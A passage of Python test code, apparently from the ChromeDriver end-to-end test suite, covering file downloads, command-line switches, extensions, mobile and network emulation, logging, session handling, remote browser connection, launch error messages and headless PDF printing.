0]') self.assertEquals(size, script_size) script_inner = self._driver.ExecuteScript( 'return [window.innerWidth * visualViewport.scale, ' 'window.innerHeight * visualViewport.scale]') # Subtract inner size by 1 to compensate for rounding errors. self.assertLessEqual(script_inner[0] - 1, size[0]) self.assertLessEqual(script_inner[1] - 1, size[1]) # Sanity check: screen dimensions in the range 20-20000px self.assertLessEqual(size[0], 20000) self.assertLessEqual(size[1], 20000) self.assertGreaterEqual(size[0], 20) self.assertGreaterEqual(size[1], 20) class ChromeDownloadDirTest(ChromeDriverBaseTest): def __init__(self, *args, **kwargs): super(ChromeDownloadDirTest, self).__init__(*args, **kwargs) self._temp_dirs = [] def CreateTempDir(self): temp_dir = tempfile.mkdtemp() self._temp_dirs.append(temp_dir) return temp_dir def RespondWithCsvFile(self, request): return {'Content-Type': 'text/csv'}, 'a,b,c\n1,2,3\n' def WaitForFileToDownload(self, path): deadline = monotonic() + 60 while True: time.sleep(0.1) if os.path.isfile(path) or monotonic() > deadline: break self.assertTrue(os.path.isfile(path), "Failed to download file!") def tearDown(self): # Call the superclass tearDown() method before deleting temp dirs, so that # Chrome has a chance to exit before its user data dir is blown away from # underneath it. super(ChromeDownloadDirTest, self).tearDown() for temp_dir in self._temp_dirs: # Deleting temp dir can fail if Chrome hasn't yet fully exited and still # has open files in there. So we ignore errors, and retry if necessary. shutil.rmtree(temp_dir, ignore_errors=True) retry = 0 while retry < 10 and os.path.exists(temp_dir): time.sleep(0.1) shutil.rmtree(temp_dir, ignore_errors=True) def testFileDownloadWithClick(self): download_dir = self.CreateTempDir() download_name = os.path.join(download_dir, 'a_red_dot.png') driver = self.CreateDriver(download_dir=download_dir) driver.Load(ChromeDriverTest.GetHttpUrlForFile( '/chromedriver/download.html')) driver.FindElement('css selector', '#red-dot').Click() self.WaitForFileToDownload(download_name) self.assertEqual( ChromeDriverTest.GetHttpUrlForFile('/chromedriver/download.html'), driver.GetCurrentUrl()) def testFileDownloadWithClickHeadless(self): download_dir = self.CreateTempDir() download_name = os.path.join(download_dir, 'a_red_dot.png') driver = self.CreateDriver(download_dir=download_dir, chrome_switches=['--headless']) driver.Load(ChromeDriverTest.GetHttpUrlForFile( '/chromedriver/download.html')) driver.FindElement('css selector', '#red-dot').Click() self.WaitForFileToDownload(download_name) self.assertEqual( ChromeDriverTest.GetHttpUrlForFile('/chromedriver/download.html'), driver.GetCurrentUrl()) def testFileDownloadAfterTabHeadless(self): download_dir = self.CreateTempDir() download_name = os.path.join(download_dir, 'a_red_dot.png') driver = self.CreateDriver(download_dir=download_dir, chrome_switches=['--headless']) driver.Load(ChromeDriverTest.GetHttpUrlForFile( '/chromedriver/empty.html')) new_window = driver.NewWindow(window_type='tab') driver.SwitchToWindow(new_window['handle']) driver.Load(ChromeDriverTest.GetHttpUrlForFile( '/chromedriver/download.html')) driver.FindElement('css selector', '#red-dot').Click() self.WaitForFileToDownload(download_name) self.assertEqual( ChromeDriverTest.GetHttpUrlForFile('/chromedriver/download.html'), driver.GetCurrentUrl()) def testFileDownloadWithGet(self): ChromeDriverTest._http_server.SetCallbackForPath( '/abc.csv', self.RespondWithCsvFile) download_dir = self.CreateTempDir() driver = self.CreateDriver(download_dir=download_dir) original_url = driver.GetCurrentUrl() driver.Load(ChromeDriverTest.GetHttpUrlForFile('/abc.csv')) self.WaitForFileToDownload(os.path.join(download_dir, 'abc.csv')) self.assertEqual(original_url, driver.GetCurrentUrl()) def testFileDownloadWithGetHeadless(self): ChromeDriverTest._http_server.SetCallbackForPath( '/abc.csv', self.RespondWithCsvFile) download_dir = self.CreateTempDir() driver = self.CreateDriver(download_dir=download_dir, chrome_switches=['--headless']) original_url = driver.GetCurrentUrl() driver.Load(ChromeDriverTest.GetHttpUrlForFile('/abc.csv')) self.WaitForFileToDownload(os.path.join(download_dir, 'abc.csv')) self.assertEqual(original_url, driver.GetCurrentUrl()) def testDownloadDirectoryOverridesExistingPreferences(self): user_data_dir = self.CreateTempDir() download_dir = self.CreateTempDir() sub_dir = os.path.join(user_data_dir, 'Default') os.mkdir(sub_dir) prefs_file_path = os.path.join(sub_dir, 'Preferences') prefs = { 'test': 'this should not be changed', 'download': { 'default_directory': '/old/download/directory' } } with open(prefs_file_path, 'w') as f: json.dump(prefs, f) driver = self.CreateDriver( chrome_switches=['user-data-dir=' + user_data_dir], download_dir=download_dir) with open(prefs_file_path) as f: prefs = json.load(f) self.assertEqual('this should not be changed', prefs['test']) download = prefs['download'] self.assertEqual(download['default_directory'], download_dir) class ChromeSwitchesCapabilityTest(ChromeDriverBaseTest): """Tests that chromedriver properly processes chromeOptions.args capabilities. Makes sure the switches are passed to Chrome. """ def testSwitchWithoutArgument(self): """Tests that switch --dom-automation can be passed to Chrome. Unless --dom-automation is specified, window.domAutomationController is undefined. """ driver = self.CreateDriver(chrome_switches=['dom-automation']) self.assertNotEqual( None, driver.ExecuteScript('return window.domAutomationController')) def testRemoteDebuggingPort(self): """Tests that passing --remote-debugging-port through capabilities works. """ # Must use retries since there is an inherent race condition in port # selection. ports_generator = util.FindProbableFreePorts() for _ in range(3): port = ports_generator.next() port_flag = 'remote-debugging-port=%s' % port try: driver = self.CreateDriver(chrome_switches=[port_flag]) except: continue driver.Load('chrome:version') command_line = driver.FindElement('css selector', '#command_line').GetText() self.assertIn(port_flag, command_line) break else: # Else clause gets invoked if "break" never happens. raise # This re-raises the most recent exception. class ChromeDesiredCapabilityTest(ChromeDriverBaseTest): """Tests that chromedriver properly processes desired capabilities.""" def testDefaultTimeouts(self): driver = self.CreateDriver() timeouts = driver.GetTimeouts() # Compare against defaults in W3C spec self.assertEquals(timeouts['implicit'], 0) self.assertEquals(timeouts['pageLoad'], 300000) self.assertEquals(timeouts['script'], 30000) def testTimeouts(self): driver = self.CreateDriver(timeouts = { 'implicit': 123, 'pageLoad': 456, 'script': 789 }) timeouts = driver.GetTimeouts() self.assertEquals(timeouts['implicit'], 123) self.assertEquals(timeouts['pageLoad'], 456) self.assertEquals(timeouts['script'], 789) # Run in Legacy mode def testUnexpectedAlertBehaviourLegacy(self): driver = self.CreateDriver(unexpected_alert_behaviour="accept", send_w3c_capability=False, send_w3c_request=False) self.assertEquals("accept", driver.capabilities['unexpectedAlertBehaviour']) driver.ExecuteScript('alert("HI");') self.WaitForCondition(driver.IsAlertOpen) self.assertRaisesRegexp(chromedriver.UnexpectedAlertOpen, 'unexpected alert open: {Alert text : HI}', driver.FindElement, 'tag name', 'div') self.assertFalse(driver.IsAlertOpen()) def testUnexpectedAlertBehaviourW3c(self): driver = self.CreateDriver(unexpected_alert_behaviour='accept', send_w3c_capability=True, send_w3c_request=True) self.assertEquals('accept', driver.capabilities['unhandledPromptBehavior']) driver.ExecuteScript('alert("HI");') self.WaitForCondition(driver.IsAlertOpen) # With unhandledPromptBehavior=accept, calling GetTitle (and most other # endpoints) automatically dismisses the alert, so IsAlertOpen() becomes # False afterwards. self.assertEquals(driver.GetTitle(), '') self.assertFalse(driver.IsAlertOpen()) class ChromeExtensionsCapabilityTest(ChromeDriverBaseTestWithWebServer): """Tests that chromedriver properly processes chromeOptions.extensions.""" def _PackExtension(self, ext_path): return base64.b64encode(open(ext_path, 'rb').read()) def testExtensionsInstall(self): """Checks that chromedriver can take the extensions in crx format.""" crx_1 = os.path.join(_TEST_DATA_DIR, 'ext_test_1.crx') crx_2 = os.path.join(_TEST_DATA_DIR, 'ext_test_2.crx') self.CreateDriver(chrome_extensions=[self._PackExtension(crx_1), self._PackExtension(crx_2)]) def testExtensionsInstallZip(self): """Checks that chromedriver can take the extensions in zip format.""" zip_1 = os.path.join(_TEST_DATA_DIR, 'ext_test_1.zip') self.CreateDriver(chrome_extensions=[self._PackExtension(zip_1)]) def testCanInspectBackgroundPage(self): crx = os.path.join(_TEST_DATA_DIR, 'ext_bg_page.crx') driver = self.CreateDriver( chrome_extensions=[self._PackExtension(crx)], experimental_options={'windowTypes': ['background_page']}) handles = driver.GetWindowHandles() for handle in handles: driver.SwitchToWindow(handle) if driver.GetCurrentUrl() == 'chrome-extension://' \ 'nibbphkelpaohebejnbojjalikodckih/_generated_background_page.html': self.assertEqual(42, driver.ExecuteScript('return magic;')) return self.fail("couldn't find generated background page for test extension") def testIFrameWithExtensionsSource(self): crx_path = os.path.join(_TEST_DATA_DIR, 'frames_extension.crx') driver = self.CreateDriver( chrome_extensions=[self._PackExtension(crx_path)]) driver.Load( ChromeDriverTest._http_server.GetUrl() + '/chromedriver/iframe_extension.html') driver.SwitchToFrame('testframe') element = driver.FindElement('css selector', '#p1') self.assertEqual('Its a frame with extension source', element.GetText()) def testDontExecuteScriptsInContentScriptContext(self): # This test extension has a content script which runs in all frames (see # https://developer.chrome.com/extensions/content_scripts) which causes each # frame on the page to be associated with multiple JS execution contexts. # Make sure that ExecuteScript operates on the page's context, rather than # the extension's content script's one. extension_path = os.path.join(_TEST_DATA_DIR, 'all_frames') driver = self.CreateDriver( chrome_switches=['load-extension=%s' % extension_path]) driver.Load( ChromeDriverTest._http_server.GetUrl() + '/chromedriver/container.html') driver.SwitchToMainFrame() self.assertEqual('one', driver.ExecuteScript("return window['global_var']")) driver.SwitchToFrame('iframe') self.assertEqual('two', driver.ExecuteScript("return window['iframe_var']")) class ChromeLogPathCapabilityTest(ChromeDriverBaseTest): """Tests that chromedriver properly processes chromeOptions.logPath.""" LOG_MESSAGE = 'Welcome to ChromeLogPathCapabilityTest!' def testChromeLogPath(self): """Checks that user can specify the path of the chrome log. Verifies that a log message is written into the specified log file. """ tmp_log_path = tempfile.NamedTemporaryFile() driver = self.CreateDriver(chrome_log_path=tmp_log_path.name) driver.ExecuteScript('console.info("%s")' % self.LOG_MESSAGE) driver.Quit() self.assertTrue(self.LOG_MESSAGE in open(tmp_log_path.name).read()) class MobileEmulationCapabilityTest(ChromeDriverBaseTestWithWebServer): """Tests that ChromeDriver processes chromeOptions.mobileEmulation. Makes sure the device metrics are overridden in DevTools and user agent is overridden in Chrome. """ # Run in Legacy mode def testDeviceMetricsWithStandardWidth(self): driver = self.CreateDriver( send_w3c_capability=False, send_w3c_request=False, mobile_emulation = { 'deviceMetrics': {'width': 360, 'height': 640, 'pixelRatio': 3}, 'userAgent': 'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Bui' 'ld/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko) Chr' 'ome/18.0.1025.166 Mobile Safari/535.19' }) driver.SetWindowRect(600, 400, None, None) driver.Load(self._http_server.GetUrl() + '/userAgent') self.assertTrue(driver.capabilities['mobileEmulationEnabled']) self.assertEqual(360, driver.ExecuteScript('return window.screen.width')) self.assertEqual(640, driver.ExecuteScript('return window.screen.height')) # Run in Legacy mode def testDeviceMetricsWithDeviceWidth(self): driver = self.CreateDriver( send_w3c_capability=False, send_w3c_request=False, mobile_emulation = { 'deviceMetrics': {'width': 360, 'height': 640, 'pixelRatio': 3}, 'userAgent': 'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Bui' 'ld/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko) Chr' 'ome/18.0.1025.166 Mobile Safari/535.19' }) driver.Load(self._http_server.GetUrl() + '/userAgentUseDeviceWidth') self.assertTrue(driver.capabilities['mobileEmulationEnabled']) self.assertEqual(360, driver.ExecuteScript('return window.screen.width')) self.assertEqual(640, driver.ExecuteScript('return window.screen.height')) def testUserAgent(self): driver = self.CreateDriver( mobile_emulation = {'userAgent': 'Agent Smith'}) driver.Load(self._http_server.GetUrl() + '/userAgent') body_tag = driver.FindElement('tag name', 'body') self.assertEqual("Agent Smith", body_tag.GetText()) def testDeviceName(self): driver = self.CreateDriver( mobile_emulation = {'deviceName': 'Nexus 5'}) driver.Load(self._http_server.GetUrl() + '/userAgentUseDeviceWidth') self.assertEqual(360, driver.ExecuteScript('return window.screen.width')) self.assertEqual(640, driver.ExecuteScript('return window.screen.height')) body_tag = driver.FindElement('tag name', 'body') self.assertRegexpMatches( body_tag.GetText(), '^' + re.escape('Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) ' 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/') + r'\d+\.\d+\.\d+\.\d+' + re.escape(' Mobile Safari/537.36') + '$') def testSendKeysToElement(self): driver = self.CreateDriver( mobile_emulation = {'deviceName': 'Nexus 5'}) text = driver.ExecuteScript( 'document.body.innerHTML = \'<input type="text">\';' 'var input = document.getElementsByTagName("input")[0];' 'input.addEventListener("change", function() {' ' document.body.appendChild(document.createElement("br"));' '});' 'return input;') text.SendKeys('0123456789+-*/ Hi') text.SendKeys(', there!') value = driver.ExecuteScript('return arguments[0].value;', text) self.assertEquals('0123456789+-*/ Hi, there!', value) def testClickElement(self): driver = self.CreateDriver( mobile_emulation = {'deviceName': 'Nexus 5'}) driver.Load('about:blank') div = driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.addEventListener("click", function() {' ' div.innerHTML="new<br>";' '});' 'return div;') div.Click() self.assertEquals(1, len(driver.FindElements('tag name', 'br'))) # Run in Legacy mode def testTapElement(self): driver = self.CreateDriver( send_w3c_capability=False, send_w3c_request=False, mobile_emulation = {'deviceName': 'Nexus 5'}) driver.Load('about:blank') div = driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.addEventListener("touchstart", function() {' ' div.innerHTML="new<br>";' '});' 'return div;') div.SingleTap() self.assertEquals(1, len(driver.FindElements('tag name', 'br'))) def testNetworkConnectionDisabledByDefault(self): driver = self.CreateDriver() self.assertFalse(driver.capabilities['networkConnectionEnabled']) def testNetworkConnectionUnsupported(self): driver = self.CreateDriver() # Network connection capability must be enabled to set/retrieve self.assertRaises(chromedriver.UnknownError, driver.GetNetworkConnection) self.assertRaises(chromedriver.UnknownError, driver.SetNetworkConnection, 0x1) # Run in Legacy mode def testNetworkConnectionEnabled(self): # mobileEmulation must be enabled for networkConnection to be enabled driver = self.CreateDriver( mobile_emulation={'deviceName': 'Nexus 5'}, network_connection=True, send_w3c_capability=False, send_w3c_request=False) self.assertTrue(driver.capabilities['mobileEmulationEnabled']) self.assertTrue(driver.capabilities['networkConnectionEnabled']) def testEmulateNetworkConnection4g(self): driver = self.CreateDriver( mobile_emulation={'deviceName': 'Nexus 5'}, network_connection=True) # Test 4G connection. connection_type = 0x8 returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) network = driver.GetNetworkConnection() self.assertEquals(network, connection_type) def testEmulateNetworkConnectionMultipleBits(self): driver = self.CreateDriver( mobile_emulation={'deviceName': 'Nexus 5'}, network_connection=True) # Connection with 4G, 3G, and 2G bits on. # Tests that 4G takes precedence. connection_type = 0x38 returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) network = driver.GetNetworkConnection() self.assertEquals(network, connection_type) def testWifiAndAirplaneModeEmulation(self): driver = self.CreateDriver( mobile_emulation={'deviceName': 'Nexus 5'}, network_connection=True) # Connection with both Wifi and Airplane Mode on. # Tests that Wifi takes precedence over Airplane Mode. connection_type = 0x3 returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) network = driver.GetNetworkConnection() self.assertEquals(network, connection_type) def testNetworkConnectionTypeIsAppliedToAllTabsImmediately(self): def respondWithString(request): return {}, """ <html> <body>%s</body> </html>""" % "hello world!" self._http_server.SetCallbackForPath( '/helloworld', respondWithString) driver = self.CreateDriver( mobile_emulation={'deviceName': 'Nexus 5'}, network_connection=True) # Set network to online connection_type = 0x10 returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) # Open a window with two divs counting successful + unsuccessful # attempts to complete XML task driver.Load( self._http_server.GetUrl() +'/chromedriver/xmlrequest_test.html') window1_handle = driver.GetCurrentWindowHandle() old_handles = driver.GetWindowHandles() driver.FindElement('css selector', '#requestButton').Click() driver.FindElement('css selector', '#link').Click() new_window_handle = self.WaitForNewWindow(driver, old_handles) self.assertNotEqual(None, new_window_handle) driver.SwitchToWindow(new_window_handle) self.assertEquals(new_window_handle, driver.GetCurrentWindowHandle()) # Set network to offline to determine whether the XML task continues to # run in the background, indicating that the conditions are only applied # to the current WebView connection_type = 0x1 returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) driver.SwitchToWindow(window1_handle) connection_type = 0x1 def testNetworkConnectionTypeIsAppliedToAllTabs(self): driver = self.CreateDriver( mobile_emulation={'deviceName': 'Nexus 5'}, network_connection=True) driver.Load(self._http_server.GetUrl() +'/chromedriver/page_test.html') window1_handle = driver.GetCurrentWindowHandle() old_handles = driver.GetWindowHandles() # Test connection is offline. connection_type = 0x1; returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) network = driver.GetNetworkConnection() self.assertEquals(network, connection_type) # Navigate to another window. driver.FindElement('css selector', '#link').Click() new_window_handle = self.WaitForNewWindow(driver, old_handles) self.assertNotEqual(None, new_window_handle) driver.SwitchToWindow(new_window_handle) self.assertEquals(new_window_handle, driver.GetCurrentWindowHandle()) self.assertRaises( chromedriver.NoSuchElement, driver.FindElement, 'css selector', '#link') # Set connection to 3G in second window. connection_type = 0x10; returned_type = driver.SetNetworkConnection(connection_type) self.assertEquals(connection_type, returned_type) driver.SwitchToWindow(window1_handle) self.assertEquals(window1_handle, driver.GetCurrentWindowHandle()) # Test whether first window has old or new network conditions. network = driver.GetNetworkConnection() self.assertEquals(network, connection_type) def testDefaultComplianceMode(self): driver = self.CreateDriver(send_w3c_capability=None, send_w3c_request=True) self.assertTrue(driver.w3c_compliant) def testW3cCompliantResponses(self): # It's an error to send Legacy format request # without Legacy capability flag. with self.assertRaises(chromedriver.InvalidArgument): self.CreateDriver(send_w3c_request=False) # It's an error to send Legacy format capability # without Legacy request flag. with self.assertRaises(chromedriver.SessionNotCreated): self.CreateDriver(send_w3c_capability=False) # Can enable W3C capability in a W3C format request. driver = self.CreateDriver(send_w3c_capability=True) self.assertTrue(driver.w3c_compliant) # Can enable W3C request in a legacy format request. driver = self.CreateDriver(send_w3c_request=True) self.assertTrue(driver.w3c_compliant) # Asserts that errors are being raised correctly in the test client # with a W3C compliant driver. self.assertRaises(chromedriver.UnknownError, driver.GetNetworkConnection) # Can set Legacy capability flag in a Legacy format request. driver = self.CreateDriver(send_w3c_capability=False, send_w3c_request=False) self.assertFalse(driver.w3c_compliant) class ChromeDriverLogTest(ChromeDriverBaseTest): """Tests that chromedriver produces the expected log file.""" UNEXPECTED_CHROMEOPTION_CAP = 'unexpected_chromeoption_capability' LOG_MESSAGE = 'unrecognized chrome option: %s' % UNEXPECTED_CHROMEOPTION_CAP def testChromeDriverLog(self): _, tmp_log_path = tempfile.mkstemp(prefix='chromedriver_log_') chromedriver_server = server.Server( _CHROMEDRIVER_BINARY, log_path=tmp_log_path) try: driver = chromedriver.ChromeDriver( chromedriver_server.GetUrl(), chromedriver_server.GetPid(), chrome_binary=_CHROME_BINARY, experimental_options={ self.UNEXPECTED_CHROMEOPTION_CAP : 1 }) driver.Quit() except chromedriver.ChromeDriverException, e: self.assertTrue(self.LOG_MESSAGE in e.message) finally: chromedriver_server.Kill() with open(tmp_log_path, 'r') as f: self.assertTrue(self.LOG_MESSAGE in f.read()) def testDisablingDriverLogsSuppressesChromeDriverLog(self): _, tmp_log_path = tempfile.mkstemp(prefix='chromedriver_log_') chromedriver_server = server.Server( _CHROMEDRIVER_BINARY, log_path=tmp_log_path, verbose=False) try: driver = self.CreateDriver( chromedriver_server.GetUrl(), logging_prefs={'driver':'OFF'}) driver.Load( ChromeDriverTest._http_server.GetUrl() + '/chromedriver/empty.html') driver.AddCookie({'name': 'secret_code', 'value': 'bosco'}) driver.Quit() finally: chromedriver_server.Kill() with open(tmp_log_path, 'r') as f: self.assertNotIn('bosco', f.read()) class ChromeLoggingCapabilityTest(ChromeDriverBaseTest): """Tests chromedriver tracing support and Inspector event collection.""" def testPerformanceLogger(self): driver = self.CreateDriver( experimental_options={'perfLoggingPrefs': { 'traceCategories': 'blink.console' }}, logging_prefs={'performance':'ALL'}) driver.Load( ChromeDriverTest._http_server.GetUrl() + '/chromedriver/empty.html') # Mark the timeline; later we will verify the marks appear in the trace. driver.ExecuteScript('console.time("foobar")') driver.ExecuteScript('console.timeEnd("foobar")') logs = driver.GetLog('performance') driver.Quit() marked_timeline_events = [] seen_log_domains = {} for entry in logs: devtools_message = json.loads(entry['message'])['message'] method = devtools_message['method'] domain = method[:method.find('.')] seen_log_domains[domain] = True if method != 'Tracing.dataCollected': continue self.assertTrue('params' in devtools_message) self.assertTrue(isinstance(devtools_message['params'], dict)) cat = devtools_message['params'].get('cat', '') if (cat == 'blink.console' and devtools_message['params']['name'] == 'foobar'): marked_timeline_events.append(devtools_message) self.assertEquals(2, len(marked_timeline_events)) self.assertEquals({'Network', 'Page', 'Tracing'}, set(seen_log_domains.keys())) def testDevToolsEventsLogger(self): """Tests that the correct event type (and no other) is logged""" event = 'Page.loadEventFired' driver = self.CreateDriver( devtools_events_to_log=[event], logging_prefs={'devtools':'ALL'}) driver.Load('about:blank') logs = driver.GetLog('devtools') for entry in logs: devtools_message = json.loads(entry['message']) method = devtools_message['method'] self.assertTrue('params' in devtools_message) self.assertEquals(event, method) class SessionHandlingTest(ChromeDriverBaseTest): """Tests for session operations.""" def testQuitASessionMoreThanOnce(self): driver = self.CreateDriver() driver.Quit() driver.Quit() def testGetSessions(self): driver = self.CreateDriver() response = driver.GetSessions() self.assertEqual(1, len(response)) driver2 = self.CreateDriver() response = driver2.GetSessions() self.assertEqual(2, len(response)) class RemoteBrowserTest(ChromeDriverBaseTest): """Tests for ChromeDriver remote browser capability.""" def setUp(self): self.assertTrue(_CHROME_BINARY is not None, 'must supply a chrome binary arg') def testConnectToRemoteBrowser(self): # Must use retries since there is an inherent race condition in port # selection. ports_generator = util.FindProbableFreePorts() for _ in range(3): port = ports_generator.next() temp_dir = util.MakeTempDir() print 'temp dir is ' + temp_dir cmd = [_CHROME_BINARY, '--remote-debugging-port=%d' % port, '--user-data-dir=%s' % temp_dir, '--use-mock-keychain'] process = subprocess.Popen(cmd) try: driver = self.CreateDriver(debugger_address='localhost:%d' % port) driver.ExecuteScript('console.info("%s")' % 'connecting at %d!' % port) driver.Quit() except: continue finally: if process.poll() is None: process.terminate() # Wait for Chrome to exit here to prevent a race with Chrome to # delete/modify the temporary user-data-dir. # Maximum wait ~1 second. for _ in range(20): if process.poll() is not None: break print 'continuing to wait for Chrome to exit' time.sleep(.05) else: process.kill() break else: # Else clause gets invoked if "break" never happens. raise # This re-raises the most recent exception. def testConnectToRemoteBrowserLiteralAddressHeadless(self): debug_addrs = ['127.0.0.1', '::1'] debug_url_addrs = ['127.0.0.1', '[::1]'] for (debug_addr, debug_url_addr) in zip(debug_addrs, debug_url_addrs): # Must use retries since there is an inherent race condition in port # selection. ports_generator = util.FindProbableFreePorts() for _ in range(3): port = ports_generator.next() temp_dir = util.MakeTempDir() print 'temp dir is ' + temp_dir cmd = [_CHROME_BINARY, '--headless', '--remote-debugging-address=%s' % debug_addr, '--remote-debugging-port=%d' % port, '--user-data-dir=%s' % temp_dir, '--use-mock-keychain'] process = subprocess.Popen(cmd) try: driver = self.CreateDriver( debugger_address='%s:%d' % (debug_url_addr, port)) driver.ExecuteScript( 'console.info("%s")' % 'connecting at %d!' % port) driver.Quit() except: continue finally: if process.poll() is None: process.terminate() # Wait for Chrome to exit here to prevent a race with Chrome to # delete/modify the temporary user-data-dir. # Maximum wait ~1 second. for _ in range(20): if process.poll() is not None: break print 'continuing to wait for Chrome to exit' time.sleep(.05) else: process.kill() break else: # Else clause gets invoked if "break" never happens. raise # This re-raises the most recent exception. class LaunchDesktopTest(ChromeDriverBaseTest): """Tests that launching desktop Chrome works.""" def testExistingDevToolsPortFile(self): """If a DevTools port file already exists before startup, then we should ignore it and get our debug port number from the new file.""" user_data_dir = tempfile.mkdtemp() try: dev_tools_port_file = os.path.join(user_data_dir, 'DevToolsActivePort') with open(dev_tools_port_file, 'w') as fd: fd.write('34\n/devtools/browser/2dab5fb1-5571-40d8-a6ad-98823bc5ff84') driver = self.CreateDriver( chrome_switches=['user-data-dir=' + user_data_dir]) with open(dev_tools_port_file, 'r') as fd: port = int(fd.readlines()[0]) # Ephemeral ports are always high numbers. self.assertTrue(port > 100) finally: shutil.rmtree(user_data_dir, ignore_errors=True) def testHelpfulErrorMessage_NormalExit(self): """If Chrome fails to start, we should provide a useful error message.""" if util.IsWindows(): # Not bothering implementing a Windows test since then I would have # to implement Windows-specific code for a program that quits and ignores # any arguments. Linux and Mac should be good enough coverage. return file_descriptor, path = tempfile.mkstemp() try: os.write(file_descriptor, '#!/bin/bash\nexit 0') os.close(file_descriptor) os.chmod(path, 0777) exception_raised = False try: driver = chromedriver.ChromeDriver(_CHROMEDRIVER_SERVER_URL, _CHROMEDRIVER_SERVER_PID, chrome_binary=path, test_name=self.id()) except Exception as e: self.assertIn('Chrome failed to start', e.message) self.assertIn('exited normally', e.message) self.assertIn('ChromeDriver is assuming that Chrome has crashed', e.message) exception_raised = True self.assertTrue(exception_raised) try: driver.Quit() except: pass finally: pass os.remove(path) def testNoBinaryErrorMessage(self): temp_dir = tempfile.mkdtemp() exception_raised = False try: driver = chromedriver.ChromeDriver( _CHROMEDRIVER_SERVER_URL, _CHROMEDRIVER_SERVER_PID, chrome_binary=os.path.join(temp_dir, 'this_file_should_not_exist'), test_name=self.id()) except Exception as e: self.assertIn('no chrome binary', e.message) exception_raised = True finally: shutil.rmtree(temp_dir) self.assertTrue(exception_raised) class PerfTest(ChromeDriverBaseTest): """Tests for ChromeDriver perf.""" def _RunDriverPerfTest(self, name, test_func): """Runs a perf test ChromeDriver server. Args: name: The name of the perf test. test_func: Called with the server url to perform the test action. Must return the time elapsed. """ result = [] for iteration in range(10): result += [test_func(_CHROMEDRIVER_SERVER_URL)] def PrintResult(result): mean = sum(result) / len(result) avg_dev = sum([abs(sample - mean) for sample in result]) / len(result) print 'perf result', name, mean, avg_dev, result util.AddBuildStepText('%s: %.3f+-%.3f' % ( name, mean, avg_dev)) # Discard first result, which may be off due to cold start. PrintResult(result[1:]) def testSessionStartTime(self): def Run(url): start = monotonic() driver = self.CreateDriver(url) end = monotonic() driver.Quit() return end - start self._RunDriverPerfTest('session start', Run) def testSessionStopTime(self): def Run(url): driver = self.CreateDriver(url) start = monotonic() driver.Quit() end = monotonic() return end - start self._RunDriverPerfTest('session stop', Run) def testColdExecuteScript(self): def Run(url): driver = self.CreateDriver(url) start = monotonic() driver.ExecuteScript('return 1') end = monotonic() driver.Quit() return end - start self._RunDriverPerfTest('cold exe js', Run) class HeadlessInvalidCertificateTest(ChromeDriverBaseTestWithWebServer): """End to end tests for ChromeDriver.""" @staticmethod def GetHttpsUrlForFile(file_path): return ( HeadlessInvalidCertificateTest._https_server.GetUrl() + file_path) def setUp(self): self._driver = self.CreateDriver(chrome_switches = ["--headless"], accept_insecure_certs = True) def testLoadsPage(self): print "loading" self._driver.Load(self.GetHttpsUrlForFile('/chromedriver/page_test.html')) # Verify that page content loaded. self._driver.FindElement('css selector', '#link') def testNavigateNewWindow(self): print "loading" self._driver.Load(self.GetHttpsUrlForFile('/chromedriver/page_test.html')) self._driver.ExecuteScript( 'document.getElementById("link").href = "page_test.html";') old_handles = self._driver.GetWindowHandles() self._driver.FindElement('css selector', '#link').Click() new_window_handle = self.WaitForNewWindow(self._driver, old_handles) self.assertNotEqual(None, new_window_handle) self._driver.SwitchToWindow(new_window_handle) self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle()) # Verify that page content loaded in new window. self._driver.FindElement('css selector', '#link') class HeadlessChromeDriverTest(ChromeDriverBaseTestWithWebServer): """End to end tests for ChromeDriver.""" def setUp(self): self._driver = self.CreateDriver(chrome_switches=['--headless']) def _newWindowDoesNotFocus(self, window_type='window'): current_handles = self._driver.GetWindowHandles() self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/focus_blur_test.html')) new_window = self._driver.NewWindow(window_type=window_type) text = self._driver.FindElement('css selector', '#result').GetText() self.assertTrue(new_window['handle'] not in current_handles) self.assertTrue(new_window['handle'] in self._driver.GetWindowHandles()) self.assertEquals(text, 'PASS') def testNewWindowDoesNotFocus(self): self._newWindowDoesNotFocus(window_type='window') def testNewTabDoesNotFocus(self): self._newWindowDoesNotFocus(window_type='tab') def testWindowFullScreen(self): old_rect_list = self._driver.GetWindowRect() # Testing the resulting screensize doesn't work in headless, because there # is no screen to give a size. # We just want to ensure this command doesn't timeout or error. self._driver.FullScreenWindow() # Restore a known size so next tests won't fail self._driver.SetWindowRect(*old_rect_list) def testPrintHeadless(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) pdf = self._driver.PrintPDF({ 'orientation': 'landscape', 'scale': 1.1, 'margin': { 'top': 1.1, 'bottom': 2.2, 'left': 3.3, 'right': 4.4 }, 'background': True, 'shrinkToFit': False, 'pageRanges': [1], 'page': { 'width': 15.6, 'height': 20.6 } }) decoded_pdf = base64.b64decode(pdf) self.assertTrue(decoded_pdf.startswith("%PDF")) self.assertTrue(decoded_pdf.endswith("%%EOF")) def testPrintInvalidArgumentHeadless(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self.assertRaises(chromedriver.InvalidArgument, self._driver.PrintPDF, {'pageRanges': ['x-y']}) class SupportIPv4AndIPv6(ChromeDriverBaseTest): def testSupportIPv4AndIPv6(self): has_ipv4 = False has_ipv6 = False for info in socket.getaddrinfo('localhost', 0): if info[0] == socket.AF_INET: has_ipv4 = True if info[0] == socket.AF_INET6: has_ipv6 = True if has_ipv4: 